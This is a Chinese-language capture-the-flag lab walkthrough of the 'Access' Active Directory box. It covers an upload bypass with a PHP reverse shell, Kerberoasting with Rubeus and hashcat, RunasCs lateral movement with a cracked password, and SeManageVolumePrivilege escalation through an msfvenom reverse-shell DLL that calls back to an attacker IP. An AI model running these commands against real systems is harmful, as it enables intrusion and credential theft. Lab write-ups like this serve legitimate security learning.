当前位置: 首页 > news >正文

靶场(二十五)---小白心得靶场体会---Access

 老样子先扫端口,依旧没啥太多好玩的

53/tcp    open   domain        Simple DNS Plus
80/tcp    open   http          Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Access The Event
88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-18 01:33:16Z)
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain:access.offsec0., Site: Default-First-Site-Name)
443/tcp   open   ssl/http      Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-title: Access The Event
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
445/tcp   open   microsoft-ds?
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open   mc-nmf        .NET Message Framing
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp closed unknown
49668/tcp open   msrpc         Microsoft Windows RPC
49669/tcp open   msrpc         Microsoft Windows RPC
49670/tcp open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open   msrpc         Microsoft Windows RPC
49674/tcp open   msrpc         Microsoft Windows RPC
49679/tcp open   msrpc         Microsoft Windows RPC
49701/tcp open   msrpc         Microsoft Windows RPC
49776/tcp open   msrpc         Microsoft Windows RPC
Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-06-18T01:34:15
|_  start_date: N/A

 先看常规80端口,在这个网页存在一个上传图片的地方,就在这个购买地方点击即可看到(不要问我咋发现的,问就是把所有端口搞了一下,最后没法子了在这个网页瞎点点出来的)

 然后这里可以用kali自带的php马子,但是呢我用了发现还是reverse.com的php马子好使

 然后呢就是抓包改包了,由于我们上传的png图片要改一下后缀,而且这个后缀改完之后记得加上俩点,要不然上传会不成功,返回包跟我一样就代表上传成功了

这里也是展示一下reverse.com上的马子,给了大家两种选择怎么舒服怎么来

然后就是老样子用编码过后的反弹shell的命令进行反弹

当然这个上传接口是通过dirsearch跑出来的,我忘截图了但是我相信大家应该不会少了这一步吧

也是成功拿到了初始shell

然后这个靶场是ad环境的靶场,所以肯定要用一下bloodhound了,但是没有初始票据,所以不能用bloodhound-python去跑,只能上一个sharphound了

然后这台靶机不知道啥问题传输文件居然只能用nc传输,并且大家需要注意nc传输命令必须在cmd窗口执行

然后就是在分析窗口挨个点一下(开玩笑的啦,由于在端口扫描中看到了kerberoast,所以看一下靶机环境下有没有Kerberos用户)。果然发现了svc_mssql是kerberoast用户

然后由于还是没有初始票据的原因,所以我们用rubeus进行提取hash的操作,这里也是成功提取除了svc_mssql用户的票据

./Rebeus.exe kerberoast /nowrap

然后就是使用hashcat进行破解,成功拿到密码

 本来想用原先靶场中用到的runas命令进行横向转移,但是不知道为啥就是用不了

于是我果断又找了一种runnas的登录用法,在powershell中执行这两条命令便可拿到svc_mssql用户的shell

Import-Module .\Invoke-RunasCs.ps1
Invoke-RunasCs svc_mssql trustno1 cmd.exe -Remote 192.168.45.230:3344

展示成果,别看这里是什么system32但权限不是administrator,不要高兴太早

然后在这个权限下我看了看有没有可以劫持的exe或者dll,这里sharpup扫出来的exe劫持直接忽略掉就好,提不了权不用试了

然后老样子再用winpeas看看在当前用户下有无新东西,结果别说还真有,有的还真比较新我都没学过,找外援才知道这个semanagevolumeprivilege存在提权点

 这个提权操作很简单,就是构造一个这个名字恶意的dll,然后做一下劫持就好

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.230 LPORT=3344 -f dll -o Printconfig.dll

然后再把这个exe执行程序下一下,要不然写不进去dll

 再然后就是i输入这两条命令就可以实现反弹shell了

$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)

 这里展示一下我转移的dll文件

也是成功拿到管理员权限

总结:

这个靶场难度不大,主要是提权点比较新,然后就是工具的合理利用,其他也就没啥了,增长见识用的靶场。

链接:

antonioCoco/RunasCs: RunasCs - Csharp and open version of windows builtin runas.exe

GhostPack/Rubeus: Trying to tame the three-headed dog.

Release SeManageVolumeExploit · CsEnox/SeManageVolumeExploit

http://www.lqws.cn/news/442765.html

相关文章:

  • 基于Python+PySide6构建的夸克网盘批量工具,支持批量转存与分享
  • 使用NPOI库导出多个Excel并压缩zip包
  • Qt 解析复杂对象构成
  • 基于C#的Baumer相机二次开发教程
  • VACM 详解:SNMPv3 的访问控制核心
  • 基于大模型的急性结石性胆囊炎全流程预测与诊疗方案研究
  • 小白畅通Linux之旅-----Rsync+sersync实现数据实时同步
  • 九九乘法表
  • [Data Pipeline] Kafka消息 | Redis缓存 | Docker部署(Lambda架构)
  • 编辑器及脚本案例
  • 2025-05-05-80x86汇编语言环境配置
  • Java中创建线程的几种方式
  • 软考-软件设计师--校验码
  • 矩阵置零C++
  • jmeter学习
  • ABP VNext + MongoDB 数据存储:多模型支持与 NoSQL 扩展
  • HarmonyOS开发利器:ArkTS全解析
  • 深入解析connect函数:阻塞与非阻塞模式下的行为差异
  • 利用DevEco Studio对RK3588的HiHopesOS-4.1.110(OpenHarmony)进行Qt程序编写
  • Linux基本指令篇 —— mkdir指令
  • linux 非root 非sudo 如何安装软件
  • 基于Geotools的两条道路相交并根据交点形成新路线实战-以OSM数据为例
  • 微信小程序传参过来了,但是数据没有获取到
  • 编码规则设计唯一编码
  • 基于Spring Boot+Vue的“暖寓”宿舍管理系统设计与实现(源码及文档)
  • YunParking路内停车源码追缴分成机制设计与技术实现​
  • docker使用技巧之把扩展卷命名变成有意义
  • AWS Security Hub邮件告警设置
  • 计算机网络:(四)物理层的基本概念,数据通信的基础知识,物理层下面的传输媒体
  • 系统思考:结构影响行为